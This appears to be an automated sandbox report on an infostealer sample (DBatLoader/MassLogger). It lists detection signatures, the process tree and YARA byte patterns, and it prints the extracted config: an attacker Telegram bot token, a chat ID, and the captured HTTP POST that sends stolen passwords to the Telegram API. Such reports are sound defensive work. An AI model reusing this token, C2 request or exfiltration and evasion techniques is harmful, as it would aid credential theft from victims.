Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
y79a2l1FY5.exe

Overview

General Information

Sample name:y79a2l1FY5.exe
renamed because original name is a hash value
Original sample name:1a3d4243cf435ec6034f3814551150ed.exe
Analysis ID:1636869
MD5:1a3d4243cf435ec6034f3814551150ed
SHA1:3ee58a6e81c9b43fdceb3d8c1bf7d053f92c7073
SHA256:95d10ff038effd4a63c0cdd97b40da1877c01a21d91cf0d72917387f1771d024
Tags:exeuser-abuse_ch
Infos:

Detection

DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Joe Sandbox ML detected suspicious sample
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • y79a2l1FY5.exe (PID: 6664 cmdline: "C:\Users\user\Desktop\y79a2l1FY5.exe" MD5: 1A3D4243CF435EC6034F3814551150ED)
    • cmd.exe (PID: 6868 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\3207.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7016 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\19435.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7160 cmdline: ping 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • dajivhqI.pif (PID: 6164 cmdline: C:\\Users\\user\\Links\dajivhqI.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM", "Telegram Chatid": "6306897853"}
SourceRuleDescriptionAuthorStrings
00000007.00000001.881378637.0000000000400000.00000040.00000001.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
00000000.00000002.883239659.00000000023CE000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
      00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
          Click to see the 39 entries
          SourceRuleDescriptionAuthorStrings
          7.1.dajivhqI.pif.46b268.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          7.2.dajivhqI.pif.400000.2.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          7.1.dajivhqI.pif.400000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          7.2.dajivhqI.pif.438038.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x502e0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x332b0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x33930:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x51fba:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x51c00:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          • 0x510b8:$s6: constructor or from DllMain.
          7.2.dajivhqI.pif.400000.2.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 18 88 44 24 2B 88 44 24 2F B0 6E 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          Click to see the 137 entries

          System Summary

          barindex
          Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\y79a2l1FY5.exe, ProcessId: 6664, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\\Users\\user\\Links\dajivhqI.pif, CommandLine: C:\\Users\\user\\Links\dajivhqI.pif, CommandLine|base64offset|contains: , Image: C:\Users\user\Links\dajivhqI.pif, NewProcessName: C:\Users\user\Links\dajivhqI.pif, OriginalFileName: C:\Users\user\Links\dajivhqI.pif, ParentCommandLine: "C:\Users\user\Desktop\y79a2l1FY5.exe", ParentImage: C:\Users\user\Desktop\y79a2l1FY5.exe, ParentProcessId: 6664, ParentProcessName: y79a2l1FY5.exe, ProcessCommandLine: C:\\Users\\user\\Links\dajivhqI.pif, ProcessId: 6164, ProcessName: dajivhqI.pif
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-13T08:09:02.699128+010020577441Malware Command and Control Activity Detected192.168.2.849684149.154.167.220443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-13T08:08:51.265993+010028032742Potentially Bad Traffic192.168.2.849682193.122.130.080TCP
          2025-03-13T08:08:59.453405+010028032742Potentially Bad Traffic192.168.2.849682193.122.130.080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-13T08:09:01.348691+010018100081Potentially Bad Traffic192.168.2.849684149.154.167.220443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: y79a2l1FY5.exeAvira: detected
          Source: 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM", "Telegram Chatid": "6306897853"}
          Source: dajivhqI.pif.6164.7.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM/sendMessage"}
          Source: y79a2l1FY5.exeVirustotal: Detection: 58%Perma Link
          Source: y79a2l1FY5.exeReversingLabs: Detection: 63%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Location Tracking

          barindex
          Source: unknownDNS query: name: reallyfreegeoip.org

          Compliance

          barindex
          Source: C:\Users\user\Links\dajivhqI.pifUnpacked PE file: 7.2.dajivhqI.pif.400000.2.unpack
          Source: y79a2l1FY5.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49683 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49684 version: TLS 1.2
          Source: Binary string: easinvoker.pdb source: y79a2l1FY5.exe, 00000000.00000002.883646315.0000000002860000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.877707933.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: _.pdb source: dajivhqI.pif, 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbGCTL source: y79a2l1FY5.exe, 00000000.00000002.883646315.0000000002860000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.877707933.000000007ECD0000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.878633103.0000000000849000.00000004.00000020.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.878633103.0000000000872000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\y79a2l1FY5.exeCode function: 0_2_029C52F8 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029C52F8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h7_2_29DCE188
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2A1C4541h7_2_2A1C4290
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2A1C4C97h7_2_2A1C4878
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2A1C4C97h7_2_2A1C4BC4
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2A1C4C97h7_2_2A1C486A
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2A1CF3D9h7_2_2A1CF130
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2A1CFC89h7_2_2A1CF9E0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2A1CEF81h7_2_2A1CECD8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2A1CF831h7_2_2A1CF588
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFE878h7_2_2DAFE5D0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAF07D5h7_2_2DAF0498
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAF02E9h7_2_2DAF0040
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAF9060h7_2_2DAF8DB8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFC028h7_2_2DAFBD80
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFC480h7_2_2DAFC1D8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFBBD0h7_2_2DAFB928
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFDFC8h7_2_2DAFDD20
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFE420h7_2_2DAFE178
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFDB70h7_2_2DAFD8C8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFB778h7_2_2DAFB4D0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFAEC8h7_2_2DAFAC20
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFD2C0h7_2_2DAFD018
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFB320h7_2_2DAFB078
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFD718h7_2_2DAFD470
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAF32F0h7_2_2DAF3048
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAF2A40h7_2_2DAF2798
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAF2E98h7_2_2DAF2BF0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFAA70h7_2_2DAFA7C8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFCE68h7_2_2DAFCBC0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFA1C0h7_2_2DAF9F18
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFA618h7_2_2DAFA370
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAF25E8h7_2_2DAF2340
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFF128h7_2_2DAFEE80
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAF1D38h7_2_2DAF1A90
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAF2190h7_2_2DAF1EE8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAF9D68h7_2_2DAF9AC0
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFF580h7_2_2DAFF2D8
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFECD0h7_2_2DAFEA28
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAFC8DAh7_2_2DAFC630
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAF94B8h7_2_2DAF9210
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAF9910h7_2_2DAF9668
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAF131Ah7_2_2DAF1268
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DAF131Ah7_2_2DAF1270
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DB80D0Dh7_2_2DB80B30
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then jmp 2DB81697h7_2_2DB80B30
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then push 00000000h7_2_2DB84040
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_2DB80040
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]7_2_2E1A1C24
          Source: C:\Users\user\Links\dajivhqI.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]7_2_2E1A5880

          Networking

          barindex
          Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.8:49684 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.8:49684 -> 149.154.167.220:443
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM/sendDocument?chat_id=6306897853&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd61dc65d6e19cHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
          Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49682 -> 193.122.130.0:80
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49683 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: unknownHTTP traffic detected: POST /bot7653831104:AAGSRFQyeJurjKPP8kGFOQU_KT_ipaVGGFM/sendDocument?chat_id=6306897853&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd61dc65d6e19cHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
          Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
          Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A40C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
          Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370141662.000000002A400000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370141662.000000002A40C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A38B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: dajivhqI.pif, 00000007.00000002.3369730262.0000000029F30000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3371513149.000000002B321000.00000004.00000800.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3369778895.000000002A0C0000.00000004.08000000.00040000.00000000.sdmp, dajivhqI.pif, 00000007.00000003.884211781.0000000028277000.00000004.00000020.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000002.3370026451.000000002A160000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
          Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
          Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A38B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: y79a2l1FY5.exe, 00000000.00000002.883646315.0000000002860000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000002.913174273.0000000020FB0000.00000004.00000020.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.880472759.0000000000852000.00000004.00000020.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.878119908.000000007EBC0000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.878119908.000000007EC06000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000002.913261690.00000000210D9000.00000004.00001000.00020000.00000000.sdmp, y79a2l1FY5.exe, 00000000.00000003.877707933.000000007ED16000.00000004.00001000.00020000.00000000.sdmp, dajivhqI.pif, 00000007.00000000.881059717.0000000000416000.00000002.00000001.01000000.00000005.sdmp, dajivhqI.pif.0.drString found in binary or memory: http://www.pmail.com
          Source: dajivhqI.pif, 00000007.00000002.3370141662.000000002A4E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
